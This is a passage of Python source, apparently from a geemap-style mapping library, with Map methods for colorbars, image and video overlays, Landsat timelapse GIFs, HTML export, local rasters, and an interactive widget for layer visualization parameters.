colors=colors, index=index, vmin=vmin, vmax=vmax, caption=caption
)
if categorical:
if step is not None:
colormap = colormap.to_step(step)
elif index is not None:
colormap = colormap.to_step(len(index) - 1)
else:
colormap = colormap.to_step(3)
colormap_ctrl = ipyleaflet.WidgetControl(
widget=output,
position=position,
transparent_bg=transparent_bg,
**kwargs,
)
with output:
output.clear_output()
display(colormap)
self.colorbar = colormap_ctrl
self.add_control(colormap_ctrl)
if layer_name in self.ee_layer_names:
self.ee_layer_dict[layer_name]["colorbar"] = colormap_ctrl
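# Illustrative usage sketch using the branca-based colorbar; colors are examples:
#
#     m = Map()
#     m.add_colorbar_branca(
#         colors=["0000FF", "00FF00", "FF0000"], vmin=0, vmax=4000,
#         caption="Elevation (m)",
#     )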
def remove_colorbar(self):
"""Remove colorbar from the map."""
if self.colorbar is not None:
self.remove_control(self.colorbar)
def image_overlay(self, url, bounds, name):
"""Overlays an image from the Internet or locally on the map.
Args:
url (str): http URL or local file path to the image.
bounds (tuple): bounding box of the image in the format of (lower_left(lat, lon), upper_right(lat, lon)), such as ((13, -130), (32, -100)).
name (str): name of the layer to show on the layer control.
"""
from base64 import b64encode
from io import BytesIO
from PIL import Image, ImageSequence
try:
if not url.startswith("http"):
if not os.path.exists(url):
print("The provided file does not exist.")
return
ext = os.path.splitext(url)[1][1:] # file extension
image = Image.open(url)
f = BytesIO()
if ext.lower() == "gif":
frames = []
# Loop over each frame in the animated image
for frame in ImageSequence.Iterator(image):
frame = frame.convert("RGBA")
b = BytesIO()
frame.save(b, format="gif")
frame = Image.open(b)
frames.append(frame)
frames[0].save(
f,
format="GIF",
save_all=True,
append_images=frames[1:],
loop=0,
)
else:
image.save(f, ext)
data = b64encode(f.getvalue())
data = data.decode("ascii")
url = "data:image/{};base64,".format(ext) + data
img = ipyleaflet.ImageOverlay(url=url, bounds=bounds, name=name)
self.add_layer(img)
except Exception as e:
print(e)
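# Illustrative usage sketch; the URL below is a hypothetical placeholder and the
# bounds follow the ((lower_left), (upper_right)) convention from the docstring:
#
#     m = Map()
#     m.image_overlay(
#         url="https://example.com/overlay.png",  # placeholder image URL
#         bounds=((13, -130), (32, -100)),
#         name="Image overlay",
#     )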
def video_overlay(self, url, bounds, name):
"""Overlays a video from the Internet on the map.
Args:
url (str): http URL of the video, such as "https://www.mapbox.com/bites/00188/patricia_nasa.webm"
bounds (tuple): bounding box of the video in the format of (lower_left(lat, lon), upper_right(lat, lon)), such as ((13, -130), (32, -100)).
name (str): name of the layer to show on the layer control.
"""
try:
video = ipyleaflet.VideoOverlay(url=url, bounds=bounds, name=name)
self.add_layer(video)
except Exception as e:
print(e)
def add_landsat_ts_gif(
self,
layer_name="Timelapse",
roi=None,
label=None,
start_year=1984,
end_year=2019,
start_date="06-10",
end_date="09-20",
bands=["NIR", "Red", "Green"],
vis_params=None,
dimensions=768,
frames_per_second=10,
font_size=30,
font_color="white",
add_progress_bar=True,
progress_bar_color="white",
progress_bar_height=5,
out_gif=None,
download=False,
apply_fmask=True,
nd_bands=None,
nd_threshold=0,
nd_palette=["black", "blue"],
):
"""Adds a Landsat timelapse to the map.
Args:
layer_name (str, optional): Layer name to show under the layer control. Defaults to 'Timelapse'.
roi (object, optional): Region of interest to create the timelapse. Defaults to None.
label (str, optional): A label to shown on the GIF, such as place name. Defaults to None.
start_year (int, optional): Starting year for the timelapse. Defaults to 1984.
end_year (int, optional): Ending year for the timelapse. Defaults to 2019.
start_date (str, optional): Starting date (month-day) each year for filtering ImageCollection. Defaults to '06-10'.
end_date (str, optional): Ending date (month-day) each year for filtering ImageCollection. Defaults to '09-20'.
bands (list, optional): Three bands selected from ['Blue', 'Green', 'Red', 'NIR', 'SWIR1', 'SWIR2', 'pixel_qa']. Defaults to ['NIR', 'Red', 'Green'].
vis_params (dict, optional): Visualization parameters. Defaults to None.
dimensions (int, optional): A number or a pair of numbers in the format WIDTHxHEIGHT specifying the maximum dimensions of the thumbnail to render, in pixels. If only one number is passed, it is used as the maximum, and the other dimension is computed by proportional scaling. Defaults to 768.
frames_per_second (int, optional): Animation speed. Defaults to 10.
font_size (int, optional): Font size of the animated text and label. Defaults to 30.
font_color (str, optional): Font color of the animated text and label. Defaults to 'white'.
add_progress_bar (bool, optional): Whether to add a progress bar at the bottom of the GIF. Defaults to True.
progress_bar_color (str, optional): Color for the progress bar. Defaults to 'white'.
progress_bar_height (int, optional): Height of the progress bar. Defaults to 5.
out_gif (str, optional): File path to the output animated GIF. Defaults to None.
download (bool, optional): Whether to download the gif. Defaults to False.
apply_fmask (bool, optional): Whether to apply Fmask (Function of mask) for automated clouds, cloud shadows, snow, and water masking. Defaults to True.
nd_bands (list, optional): A list of names specifying the bands to use, e.g., ['Green', 'SWIR1']. The normalized difference is computed as (first − second) / (first + second). Note that negative input values are forced to 0 so that the result is confined to the range (-1, 1). Defaults to None.
nd_threshold (float, optional): The threshold for extracting pixels from the normalized difference band. Defaults to 0.
nd_palette (list, optional): The color palette to use for displaying the normalized difference band. Defaults to ['black', 'blue'].
"""
try:
if roi is None:
if self.draw_last_feature is not None:
feature = self.draw_last_feature
roi = feature.geometry()
else:
roi = ee.Geometry.Polygon(
[
[
[-115.471773, 35.892718],
[-115.471773, 36.409454],
[-114.271283, 36.409454],
[-114.271283, 35.892718],
[-115.471773, 35.892718],
]
],
None,
False,
)
elif isinstance(roi, ee.Feature) or isinstance(roi, ee.FeatureCollection):
roi = roi.geometry()
elif isinstance(roi, ee.Geometry):
pass
else:
print("The provided roi is invalid. It must be an ee.Geometry")
return
geojson = ee_to_geojson(roi)
bounds = minimum_bounding_box(geojson)
geojson = adjust_longitude(geojson)
roi = ee.Geometry(geojson)
in_gif = landsat_ts_gif(
roi=roi,
out_gif=out_gif,
start_year=start_year,
end_year=end_year,
start_date=start_date,
end_date=end_date,
bands=bands,
vis_params=vis_params,
dimensions=dimensions,
frames_per_second=frames_per_second,
apply_fmask=apply_fmask,
nd_bands=nd_bands,
nd_threshold=nd_threshold,
nd_palette=nd_palette,
)
in_nd_gif = in_gif.replace(".gif", "_nd.gif")
print("Adding animated text to GIF ...")
add_text_to_gif(
in_gif,
in_gif,
xy=("2%", "2%"),
text_sequence=start_year,
font_size=font_size,
font_color=font_color,
duration=int(1000 / frames_per_second),
add_progress_bar=add_progress_bar,
progress_bar_color=progress_bar_color,
progress_bar_height=progress_bar_height,
)
if nd_bands is not None:
add_text_to_gif(
in_nd_gif,
in_nd_gif,
xy=("2%", "2%"),
text_sequence=start_year,
font_size=font_size,
font_color=font_color,
duration=int(1000 / frames_per_second),
add_progress_bar=add_progress_bar,
progress_bar_color=progress_bar_color,
progress_bar_height=progress_bar_height,
)
if label is not None:
add_text_to_gif(
in_gif,
in_gif,
xy=("2%", "90%"),
text_sequence=label,
font_size=font_size,
font_color=font_color,
duration=int(1000 / frames_per_second),
add_progress_bar=add_progress_bar,
progress_bar_color=progress_bar_color,
progress_bar_height=progress_bar_height,
)
# if nd_bands is not None:
# add_text_to_gif(in_nd_gif, in_nd_gif, xy=('2%', '90%'), text_sequence=label,
# font_size=font_size, font_color=font_color, duration=int(1000 / frames_per_second), add_progress_bar=add_progress_bar, progress_bar_color=progress_bar_color, progress_bar_height=progress_bar_height)
if is_tool("ffmpeg"):
reduce_gif_size(in_gif)
if nd_bands is not None:
reduce_gif_size(in_nd_gif)
print("Adding GIF to the map ...")
self.image_overlay(url=in_gif, bounds=bounds, name=layer_name)
if nd_bands is not None:
self.image_overlay(
url=in_nd_gif, bounds=bounds, name=layer_name + " ND"
)
print("The timelapse has been added to the map.")
if download:
link = create_download_link(
in_gif,
title="Click here to download the Landsat timelapse: ",
)
display(link)
if nd_bands is not None:
link2 = create_download_link(
in_nd_gif,
title="Click here to download the Normalized Difference Index timelapse: ",
)
display(link2)
except Exception as e:
raise Exception(e)
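# Illustrative usage sketch (requires an authenticated Earth Engine session;
# the rectangle matches the default Las Vegas extent used above):
#
#     m = Map()
#     roi = ee.Geometry.Rectangle([-115.471773, 35.892718, -114.271283, 36.409454])
#     m.add_landsat_ts_gif(
#         roi=roi, start_year=1985, end_year=2019,
#         bands=["NIR", "Red", "Green"], frames_per_second=5,
#     )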
def to_html(
self,
outfile,
title="My Map",
width="100%",
height="880px",
add_layer_control=True,
):
"""Saves the map as a HTML file.
Args:
outfile (str): The output file path to the HTML file.
title (str, optional): The title of the HTML file. Defaults to 'My Map'.
width (str, optional): The width of the map in pixels or percentage. Defaults to '100%'.
height (str, optional): The height of the map in pixels. Defaults to '880px'.
add_layer_control (bool, optional): Whether to add the LayersControl. Defaults to True.
"""
try:
if not outfile.endswith(".html"):
print("The output file must end with .html")
return
out_dir = os.path.dirname(outfile)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if add_layer_control and self.layer_control is None:
layer_control = ipyleaflet.LayersControl(position="topright")
self.layer_control = layer_control
self.add_control(layer_control)
before_width = self.layout.width
before_height = self.layout.height
if not isinstance(width, str):
print("width must be a string.")
return
elif width.endswith("px") or width.endswith("%"):
pass
else:
print("width must end with px or %")
return
if not isinstance(height, str):
print("height must be a string.")
return
elif not height.endswith("px"):
print("height must end with px")
return
self.layout.width = width
self.layout.height = height
self.save(outfile, title=title)
self.layout.width = before_width
self.layout.height = before_height
except Exception as e:
raise Exception(e)
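# Illustrative usage sketch; the output path is a placeholder:
#
#     m = Map()
#     m.addLayer(ee.Image("USGS/SRTMGL1_003"), {"min": 0, "max": 4000}, "DEM")
#     m.to_html("output/my_map.html", title="DEM map", width="100%", height="880px")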
def to_image(self, outfile=None, monitor=1):
"""Saves the map as a PNG or JPG image.
Args:
outfile (str, optional): The output file path to the image. Defaults to None.
monitor (int, optional): The monitor to take the screenshot. Defaults to 1.
"""
if outfile is None:
outfile = os.path.join(os.getcwd(), "my_map.png")
if outfile.endswith(".png") or outfile.endswith(".jpg"):
pass
else:
print("The output file must be a PNG or JPG image.")
return
work_dir = os.path.dirname(outfile)
if not os.path.exists(work_dir):
os.makedirs(work_dir)
screenshot = screen_capture(outfile, monitor)
self.screenshot = screenshot
def toolbar_reset(self):
"""Reset the toolbar so that no tool is selected."""
toolbar_grid = self.toolbar
for tool in toolbar_grid.children:
tool.value = False
def add_raster(
self,
image,
bands=None,
layer_name=None,
colormap=None,
x_dim="x",
y_dim="y",
):
"""Adds a local raster dataset to the map.
Args:
image (str): The image file path.
bands (int or list, optional): The image bands to use. It can be either a number (e.g., 1) or a list (e.g., [3, 2, 1]). Defaults to None.
layer_name (str, optional): The layer name to use for the raster. Defaults to None.
colormap (str, optional): The name of the colormap to use for the raster, such as 'gray' and 'terrain'. More can be found at https://matplotlib.org/3.1.0/tutorials/colors/colormaps.html. Defaults to None.
x_dim (str, optional): The x dimension. Defaults to 'x'.
y_dim (str, optional): The y dimension. Defaults to 'y'.
"""
try:
import xarray_leaflet
except Exception:
# import platform
# if platform.system() != "Windows":
# # install_from_github(
# # url='https://github.com/davidbrochart/xarray_leaflet')
# check_install('xarray_leaflet')
# import xarray_leaflet
# else:
raise ImportError(
"You need to install xarray_leaflet first. See https://github.com/davidbrochart/xarray_leaflet"
)
import warnings
# import xarray as xr
import matplotlib.pyplot as plt
import numpy as np
import rioxarray
warnings.simplefilter("ignore")
if not os.path.exists(image):
print("The image file does not exist.")
return
if colormap is None:
colormap = plt.cm.inferno
if layer_name is None:
layer_name = "Layer_" + random_string()
if isinstance(colormap, str):
colormap = plt.cm.get_cmap(name=colormap)
da = rioxarray.open_rasterio(image, masked=True)
# print(da.rio.nodata)
multi_band = False
if len(da.band) > 1:
multi_band = True
if bands is None:
bands = [3, 2, 1]
else:
bands = 1
if multi_band:
da = da.rio.write_nodata(0)
else:
da = da.rio.write_nodata(np.nan)
da = da.sel(band=bands)
# crs = da.rio.crs
# nan = da.attrs['nodatavals'][0]
# da = da / da.max()
# # if multi_band:
# da = xr.where(da == nan, np.nan, da)
# da = da.rio.write_nodata(0)
# da = da.rio.write_crs(crs)
if multi_band and type(bands) == list:
layer = da.leaflet.plot(self, x_dim=x_dim, y_dim=y_dim, rgb_dim="band")
else:
layer = da.leaflet.plot(self, x_dim=x_dim, y_dim=y_dim, colormap=colormap)
layer.name = layer_name
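# Illustrative usage sketch (requires the optional xarray_leaflet dependency;
# the GeoTIFF paths are placeholders):
#
#     m = Map()
#     m.add_raster("data/dem.tif", colormap="terrain", layer_name="Local DEM")
#     m.add_raster("data/rgb.tif", bands=[3, 2, 1], layer_name="Local RGB")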
def remove_drawn_features(self):
"""Removes user-drawn geometries from the map"""
if self.draw_layer is not None:
self.remove_layer(self.draw_layer)
self.draw_count = 0
self.draw_features = []
self.draw_last_feature = None
self.draw_layer = None
self.draw_last_json = None
self.draw_last_bounds = None
self.user_roi = None
self.user_rois = None
self.chart_values = []
self.chart_points = []
self.chart_labels = None
if self.draw_control is not None:
self.draw_control.clear()
def remove_last_drawn(self):
"""Removes user-drawn geometries from the map"""
if self.draw_layer is not None:
collection = ee.FeatureCollection(self.draw_features[:-1])
ee_draw_layer = ee_tile_layer(
collection, {"color": "blue"}, "Drawn Features", True, 0.5
)
if self.draw_count == 1:
self.remove_drawn_features()
else:
self.substitute_layer(self.draw_layer, ee_draw_layer)
self.draw_layer = ee_draw_layer
self.draw_count -= 1
self.draw_features = self.draw_features[:-1]
self.draw_last_feature = self.draw_features[-1]
self.draw_layer = ee_draw_layer
self.draw_last_json = None
self.draw_last_bounds = None
self.user_roi = ee.Feature(
collection.toList(collection.size()).get(
collection.size().subtract(1)
)
).geometry()
self.user_rois = collection
self.chart_values = self.chart_values[:-1]
self.chart_points = self.chart_points[:-1]
# self.chart_labels = None
def extract_values_to_points(self, filename):
"""Exports pixel values to a csv file based on user-drawn geometries.
Args:
filename (str): The output file path to the csv file or shapefile.
"""
import csv
filename = os.path.abspath(filename)
allowed_formats = ["csv", "shp"]
ext = filename[-3:]
if ext not in allowed_formats:
print(
"The output file must be one of the following: {}".format(
", ".join(allowed_formats)
)
)
return
out_dir = os.path.dirname(filename)
out_csv = filename[:-3] + "csv"
out_shp = filename[:-3] + "shp"
if not os.path.exists(out_dir):
os.makedirs(out_dir)
count = len(self.chart_points)
out_list = []
if count > 0:
header = ["id", "longitude", "latitude"] + self.chart_labels
out_list.append(header)
for i in range(0, count):
id = i + 1
line = [id] + self.chart_points[i] + self.chart_values[i]
out_list.append(line)
with open(out_csv, "w", newline="") as f:
writer = csv.writer(f)
writer.writerows(out_list)
if ext == "csv":
print(f"The csv file has been saved to: {out_csv}")
else:
csv_to_shp(out_csv, out_shp)
print(f"The shapefile has been saved to: {out_shp}")
def create_vis_widget(self, layer_dict):
"""Create a GUI for changing layer visualization parameters interactively.
Args:
layer_dict (dict): A dict containing information about the layer. It is an element from Map.ee_layer_dict.
Returns:
object: An ipywidget.
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
ee_object = layer_dict["ee_object"]
ee_layer = layer_dict["ee_layer"]
vis_params = layer_dict["vis_params"]
layer_name = ee_layer.name
layer_opacity = ee_layer.opacity
band_names = None
min_value = 0
max_value = 100
sel_bands = None
layer_palette = []
layer_gamma = 1
left_value = 0
right_value = 10000
self.colorbar_widget = widgets.Output(layout=widgets.Layout(height="60px"))
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
# def vdir(obj): # Get branca colormap list
# return [x for x in dir(obj) if not x.startswith("_")]
if isinstance(ee_object, ee.Image):
band_names = ee_object.bandNames().getInfo()
band_count = len(band_names)
if "min" in vis_params.keys():
min_value = vis_params["min"]
if min_value < left_value:
left_value = min_value - max_value
if "max" in vis_params.keys():
max_value = vis_params["max"]
right_value = 2 * max_value
if "gamma" in vis_params.keys():
layer_gamma = vis_params["gamma"]
if "bands" in vis_params.keys():
sel_bands = vis_params["bands"]
if "palette" in vis_params.keys():
layer_palette = [
color.replace("#", "") for color in list(vis_params["palette"])
]
vis_widget = widgets.VBox(
layout=widgets.Layout(padding="5px 5px 5px 8px", width="330px")
)
label = widgets.Label(value=f"{layer_name} visualization parameters")
radio1 = widgets.RadioButtons(
options=["1 band (Grayscale)"], layout={"width": "max-content"}
)
radio2 = widgets.RadioButtons(
options=["3 bands (RGB)"], layout={"width": "max-content"}
)
radio1.index = None
radio2.index = None
dropdown_width = "98px"
band1_dropdown = widgets.Dropdown(
options=band_names,
value=band_names[0],
layout=widgets.Layout(width=dropdown_width),
)
band2_dropdown = widgets.Dropdown(
options=band_names,
value=band_names[0],
layout=widgets.Layout(width=dropdown_width),
)
band3_dropdown = widgets.Dropdown(
options=band_names,
value=band_names[0],
layout=widgets.Layout(width=dropdown_width),
)
bands_hbox = widgets.HBox()
legend_chk = widgets.Checkbox(
value=False,
description="Legend",
indent=False,
layout=widgets.Layout(width="70px"),
)
color_picker = widgets.ColorPicker(
concise=False,
value="#000000",
layout=widgets.Layout(width="116px"),
style={"description_width": "initial"},
)
add_color = widgets.Button(
icon="plus",
tooltip="Add a hex color string to the palette",
layout=widgets.Layout(width="32px"),
)
del_color = widgets.Button(
icon="minus",
tooltip="Remove a hex color string from the palette",
layout=widgets.Layout(width="32px"),
)
reset_color = widgets.Button(
icon="eraser",
tooltip="Remove all color strings from the palette",
layout=widgets.Layout(width="34px"),
)
classes = widgets.Dropdown(
options=["Any"] + [str(i) for i in range(3, 13)],
description="Classes:",
layout=widgets.Layout(width="115px"),
style={"description_width": "initial"},
)
colormap = widgets.Dropdown(
options=plt.colormaps(),
value=None,
description="Colormap:",
layout=widgets.Layout(width="181px"),
style={"description_width": "initial"},
)
def classes_changed(change):
if change["new"]:
selected = change["owner"].value
if colormap.value is not None:
n_class = None
if selected != "Any":
n_class = int(classes.value)
colors = plt.cm.get_cmap(colormap.value, n_class)
cmap_colors = [
mpl.colors.rgb2hex(colors(i))[1:] for i in range(colors.N)
]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(cmap_colors), N=256
)
norm = mpl.colors.Normalize(
vmin=value_range.value[0], vmax=value_range.value[1]
)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
palette.value = ", ".join([color for color in cmap_colors])
if self.colorbar_widget is None:
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
if self.colorbar_ctrl is None:
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
colorbar_output = self.colorbar_widget
with colorbar_output:
colorbar_output.clear_output()
plt.show()
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}"
for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
classes.observe(classes_changed, "value")
palette = widgets.Text(
value=", ".join(layer_palette),
placeholder="List of hex color code (RRGGBB)",
description="Palette:",
tooltip="Enter a list of hex color code (RRGGBB)",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
def add_color_clicked(b):
if color_picker.value is not None:
if len(palette.value) == 0:
palette.value = color_picker.value[1:]
else:
palette.value += ", " + color_picker.value[1:]
def del_color_clicked(b):
if "," in palette.value:
items = [item.strip() for item in palette.value.split(",")]
palette.value = ", ".join(items[:-1])
else:
palette.value = ""
def reset_color_clicked(b):
palette.value = ""
add_color.on_click(add_color_clicked)
del_color.on_click(del_color_clicked)
reset_color.on_click(reset_color_clicked)
spacer = widgets.Label(layout=widgets.Layout(width="5px"))
v_spacer = widgets.Label(layout=widgets.Layout(height="5px"))
radio_btn = widgets.HBox([radio1, spacer, spacer, spacer, radio2])
value_range = widgets.FloatRangeSlider(
value=[min_value, max_value],
min=left_value,
max=right_value,
step=0.1,
description="Range:",
disabled=False,
continuous_update=False,
readout=True,
readout_format=".1f",
layout=widgets.Layout(width="300px"),
style={"description_width": "45px"},
)
range_hbox = widgets.HBox([value_range, spacer])
opacity = widgets.FloatSlider(
value=layer_opacity,
min=0,
max=1,
step=0.01,
description="Opacity:",
continuous_update=False,
readout=True,
readout_format=".2f",
layout=widgets.Layout(width="320px"),
style={"description_width": "50px"},
)
gamma = widgets.FloatSlider(
value=layer_gamma,
min=0.1,
max=10,
step=0.01,
description="Gamma:",
continuous_update=False,
readout=True,
readout_format=".2f",
layout=widgets.Layout(width="320px"),
style={"description_width": "50px"},
)
legend_chk = widgets.Checkbox(
value=False,
description="Legend",
indent=False,
layout=widgets.Layout(width="70px"),
)
linear_chk = widgets.Checkbox(
value=True,
description="Linear colormap",
indent=False,
layout=widgets.Layout(width="150px"),
)
step_chk = widgets.Checkbox(
value=False,
description="Step colormap",
indent=False,
layout=widgets.Layout(width="140px"),
)
legend_title = widgets.Text(
value="Legend",
description="Legend title:",
tooltip="Enter a title for the legend",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
legend_labels = widgets.Text(
value="Class 1, Class 2, Class 3",
description="Legend labels:",
tooltip="Enter a a list of labels for the legend",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
colormap_hbox = widgets.HBox([linear_chk, step_chk])
legend_vbox = widgets.VBox()
def linear_chk_changed(change):
if change["new"]:
step_chk.value = False
legend_vbox.children = [colormap_hbox]
else:
step_chk.value = True
def step_chk_changed(change):
if change["new"]:
linear_chk.value = False
if len(layer_palette) > 0:
legend_labels.value = ",".join(
[
"Class " + str(i)
for i in range(1, len(layer_palette) + 1)
]
)
legend_vbox.children = [
colormap_hbox,
legend_title,
legend_labels,
]
else:
linear_chk.value = True
linear_chk.observe(linear_chk_changed, "value")
step_chk.observe(step_chk_changed, "value")
def colormap_changed(change):
if change["new"]:
n_class = None
if classes.value != "Any":
n_class = int(classes.value)
colors = plt.cm.get_cmap(colormap.value, n_class)
cmap_colors = [
mpl.colors.rgb2hex(colors(i))[1:] for i in range(colors.N)
]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(cmap_colors), N=256
)
norm = mpl.colors.Normalize(
vmin=value_range.value[0], vmax=value_range.value[1]
)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
palette.value = ", ".join(cmap_colors)
if self.colorbar_widget is None:
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
if self.colorbar_ctrl is None:
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
colorbar_output = self.colorbar_widget
with colorbar_output:
colorbar_output.clear_output()
plt.show()
# display(colorbar)
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}" for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
colormap.observe(colormap_changed, "value")
btn_width = "97.5px"
import_btn = widgets.Button(
description="Import",
button_style="primary",
tooltip="Import vis params to notebook",
layout=widgets.Layout(width=btn_width),
)
apply_btn = widgets.Button(
description="Apply",
tooltip="Apply vis params to the layer",
layout=widgets.Layout(width=btn_width),
)
close_btn = widgets.Button(
description="Close",
tooltip="Close vis params diaglog",
layout=widgets.Layout(width=btn_width),
)
def import_btn_clicked(b):
vis = {}
if radio1.index == 0:
vis["bands"] = [band1_dropdown.value]
if len(palette.value) > 0:
vis["palette"] = palette.value.split(",")
else:
vis["bands"] = [
band1_dropdown.value,
band2_dropdown.value,
band3_dropdown.value,
]
vis["min"] = value_range.value[0]
vis["max"] = value_range.value[1]
vis["opacity"] = opacity.value
vis["gamma"] = gamma.value
create_code_cell(f"vis_params = {str(vis)}")
def apply_btn_clicked(b):
vis = {}
if radio1.index == 0:
vis["bands"] = [band1_dropdown.value]
if len(palette.value) > 0:
vis["palette"] = [c.strip() for c in palette.value.split(",")]
else:
vis["bands"] = [
band1_dropdown.value,
band2_dropdown.value,
band3_dropdown.value,
]
vis["gamma"] = gamma.value
vis["min"] = value_range.value[0]
vis["max"] = value_range.value[1]
self.addLayer(ee_object, vis, layer_name, True, opacity.value)
ee_layer.visible = False
if legend_chk.value:
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl.close()
self.colorbar_widget.close()
if (
"colorbar" in layer_dict.keys()
and layer_dict["colorbar"] in self.controls
):
self.remove_control(layer_dict["colorbar"])
layer_dict["colorbar"] = None
if linear_chk.value:
if (
"legend" in layer_dict.keys()
and layer_dict["legend"] in self.controls
):
self.remove_control(layer_dict["legend"])
layer_dict["legend"] = None
if len(palette.value) > 0 and "," in palette.value:
colors = to_hex_colors(
[color.strip() for color in palette.value.split(",")]
)
self.add_colorbar(
vis_params={
"palette": colors,
"min": value_range.value[0],
"max": value_range.value[1],
},
layer_name=layer_name,
)
elif step_chk.value:
if len(palette.value) > 0 and "," in palette.value:
colors = to_hex_colors(
[color.strip() for color in palette.value.split(",")]
)
labels = [
label.strip()
for label in legend_labels.value.split(",")
]
self.add_legend(
legend_title=legend_title.value,
legend_keys=labels,
legend_colors=colors,
layer_name=layer_name,
)
else:
if radio1.index == 0 and "palette" in vis:
self.colorbar_widget.clear_output()
with self.colorbar_widget:
_, ax = plt.subplots(figsize=(6, 0.4))
colors = to_hex_colors(vis["palette"])
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", colors, N=256
)
norm = mpl.colors.Normalize(
vmin=vis["min"], vmax=vis["max"]
)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
plt.show()
if (
"colorbar" in layer_dict.keys()
and layer_dict["colorbar"] in self.controls
):
self.remove_control(layer_dict["colorbar"])
layer_dict["colorbar"] = None
if (
"legend" in layer_dict.keys()
and layer_dict["legend"] in self.controls
):
self.remove_control(layer_dict["legend"])
layer_dict["legend"] = None
def close_btn_clicked(b):
if self.vis_control in self.controls:
self.remove_control(self.vis_control)
self.vis_control = None
self.vis_widget.close()
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl = None
self.colorbar_widget.close()
import_btn.on_click(import_btn_clicked)
apply_btn.on_click(apply_btn_clicked)
close_btn.on_click(close_btn_clicked)
color_hbox = widgets.HBox(
[legend_chk, color_picker, add_color, del_color, reset_color]
)
btn_hbox = widgets.HBox([import_btn, apply_btn, close_btn])
gray_box = [
label,
radio_btn,
bands_hbox,
v_spacer,
range_hbox,
opacity,
gamma,
widgets.HBox([classes, colormap]),
palette,
color_hbox,
legend_vbox,
btn_hbox,
]
rgb_box = [
label,
radio_btn,
bands_hbox,
v_spacer,
range_hbox,
opacity,
gamma,
btn_hbox,
]
def legend_chk_changed(change):
if change["new"]:
linear_chk.value = True
legend_vbox.children = [
widgets.HBox([linear_chk, step_chk]),
# legend_title,
# legend_labels,
]
else:
legend_vbox.children = []
legend_chk.observe(legend_chk_changed, "value")
if band_count < 3:
radio1.index = 0
band1_dropdown.layout.width = "300px"
bands_hbox.children = [band1_dropdown]
vis_widget.children = gray_box
legend_chk.value = False
if len(palette.value) > 0 and "," in palette.value:
import matplotlib as mpl
import matplotlib.pyplot as plt
colors = to_hex_colors(
[color.strip() for color in palette.value.split(",")]
)
self.colorbar_widget.clear_output()
with self.colorbar_widget:
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", colors, N=256
)
norm = mpl.colors.Normalize(
vmin=value_range.value[0], vmax=value_range.value[1]
)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
plt.show()
else:
radio2.index = 0
if (sel_bands is None) or (len(sel_bands) < 2):
sel_bands = band_names[0:3]
band1_dropdown.value = sel_bands[0]
band2_dropdown.value = sel_bands[1]
band3_dropdown.value = sel_bands[2]
bands_hbox.children = [
band1_dropdown,
band2_dropdown,
band3_dropdown,
]
vis_widget.children = rgb_box
def radio1_observer(sender):
radio2.unobserve(radio2_observer, names=["value"])
radio2.index = None
radio2.observe(radio2_observer, names=["value"])
band1_dropdown.layout.width = "300px"
bands_hbox.children = [band1_dropdown]
palette.value = ", ".join(layer_palette)
palette.disabled = False
color_picker.disabled = False
add_color.disabled = False
del_color.disabled = False
reset_color.disabled = False
vis_widget.children = gray_box
if len(palette.value) > 0 and "," in palette.value:
colors = [color.strip() for color in palette.value.split(",")]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(colors), N=256
)
norm = mpl.colors.Normalize(vmin=0, vmax=1)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
if self.colorbar_ctrl not in self.controls:
self.add_control(self.colorbar_ctrl)
self.colorbar_widget.clear_output()
with self.colorbar_widget:
plt.show()
def radio2_observer(sender):
radio1.unobserve(radio1_observer, names=["value"])
radio1.index = None
radio1.observe(radio1_observer, names=["value"])
band1_dropdown.layout.width = dropdown_width
bands_hbox.children = [
band1_dropdown,
band2_dropdown,
band3_dropdown,
]
palette.value = ""
palette.disabled = True
color_picker.disabled = True
add_color.disabled = True
del_color.disabled = True
reset_color.disabled = True
vis_widget.children = rgb_box
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl.close()
self.colorbar_widget.close()
radio1.observe(radio1_observer, names=["value"])
radio2.observe(radio2_observer, names=["value"])
return vis_widget
elif isinstance(ee_object, ee.FeatureCollection):
vis_widget = widgets.VBox(
layout=widgets.Layout(padding="5px 5px 5px 8px", width="330px")
